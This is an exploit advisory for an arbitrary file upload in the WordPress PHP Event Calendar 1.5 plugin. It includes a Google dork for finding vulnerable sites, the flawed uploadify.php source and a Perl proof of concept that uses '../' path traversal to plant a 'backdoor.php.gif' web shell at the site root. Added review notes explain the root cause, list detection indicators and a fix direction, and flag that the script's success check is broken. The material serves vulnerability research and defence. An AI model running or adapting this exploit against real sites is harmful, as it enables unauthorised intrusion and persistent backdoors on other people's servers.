WordPress PHP Event Calendar 1.5 Arbitrary File Upload

2015.04.04
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

######################################################################
# Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload
# Google Dork: inurl:/plugins/php-event-calendar/
# Date: 02.04.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Source Plugin: https://wordpress.org/plugins/php-event-calendar/
# Vendor HomePage: http://phpeventcalendar.com/
# Version: 1.5
# Tested on: MSwin
######################################################################
# Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php
# Vulnerable File : uploadify.php
#
# Review notes on the listing below (root cause as far as this file shows it):
#   1. No session, nonce or capability check appears in the file, and the
#      only token logic ($verifyToken) is commented out.
#   2. The destination directory is read from $_POST['targetFolder'] and is
#      passed unchanged into the path given to move_uploaded_file(), so
#      "../" sequences in it are honoured (CWE-22, path traversal).
#   3. Only the final extension of the client-supplied name is compared with
#      the allow-list; the file contents are never inspected (CWE-434,
#      unrestricted upload). A name such as x.php.gif passes the check.
#      Whether the server then runs it as PHP depends on the web server's
#      handler configuration, which this page does not show.
#   These two CWE ids describe the flaw more precisely than the CWE-264
#   given in the page header.
#
# What a defender can act on:
#   - Requests: POST multipart/form-data to the uploadify.php path above with
#     the fields Filedata, targetFolder and user_id. The field values are in
#     the request body, so access logs normally show only the path.
#   - Files: new files outside the intended upload directory named
#     "<user_id>_<original name>", in particular with a double extension.
#   - Fix direction: choose the destination and the stored file name on the
#     server, validate the content as well as the extension, require an
#     authenticated request (in WordPress: current_user_can() plus
#     wp_verify_nonce(), storing via wp_handle_upload()), and deny script
#     execution in writable directories. No fixed plugin version is named on
#     this page.

<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/

// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
// NOTE(review): the fixed destination above was replaced by a value taken
// straight from the request; nothing later in this file constrains it.
$targetFolder = $_POST['targetFolder']; // wp upload directory
// $dir is computed but no longer used: the line that prefixed it to the
// target path is commented out further down.
$dir = str_replace('\\','/',dirname(__FILE__));
// NOTE(review): request token disabled; no other authorization check follows.
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);

if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    //$targetPath = $dir.$targetFolder;
    // The client-supplied folder becomes the target path as-is.
    $targetPath = $targetFolder;
    // Both parts of the stored name come from the request (user_id and the
    // uploaded file's own name) and are concatenated without sanitizing.
    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;

    // Validate the file type
    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions
    // pathinfo() reports only the last suffix as 'extension', so this is a
    // check on the name's ending, not on what the file contains.
    $fileParts = pathinfo($_FILES['Filedata']['name']);

    if (in_array($fileParts['extension'],$fileTypes)) {
        // The return value of move_uploaded_file() is ignored; '1' is echoed
        // whether or not the move succeeded.
        move_uploaded_file($tempFile,$targetFile);
        echo '1';
    } else {
        echo 'Invalid file type.';
    }
}
?>

# Exploit
#!/usr/bin/perl
# Proof of concept: sends a single multipart/form-data POST to uploadify.php
# and prints a verdict. The target URL is hard-coded to 127.0.0.1, i.e. a
# local test instance.
# NOTE(review): there is no `use strict; use warnings;`, and $file below is an
# undeclared package global.
use LWP::UserAgent;

# Clears the terminal ('cls' on Windows, 'clear' elsewhere) before the banner.
system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print "\t +===================================================\n";
print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n";
print "\t | Author: CrashBandicot\n";
print "\t +===================================================\n\n";

# The first argument is the path of the local file to send; exit with a usage
# line when it is missing.
die "usage : perl $0 backdoor.php.gif" unless $ARGV[0];
$file = $ARGV[0];

# A browser-like User-Agent is set explicitly, so the default libwww-perl
# agent string will not appear in logs for this request.
my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);

# Form fields match what uploadify.php reads: Filedata (the array ref makes
# HTTP::Request::Common send the file's contents as the upload part),
# targetFolder (a relative path climbing five directories) and user_id
# (becomes the prefix of the stored file name). ->content keeps only the
# response body; the HTTP status is not examined.
my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php",
    Content_Type => 'form-data',
    Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content;

# NOTE(review): `$ch = ~/1/` is an assignment, not a pattern match on the
# response body, so the verdict printed here is not derived from the server's
# reply. Do not read this output as evidence that a host is or is not patched;
# check the installed plugin files instead.
if($ch = ~/1/) {
    print "\n [+] File Uploaded !";
} else {
    print "\n [-] Target not Vuln";
}

__END__

# Path Shell : http://localhost/0day_backdoor.php.gif
# (The stored name follows uploadify.php's "<user_id>_<original name>" scheme.
# Five "../" from server/classes/ in the plugin path given above lead to the
# site root, which matches this URL.)

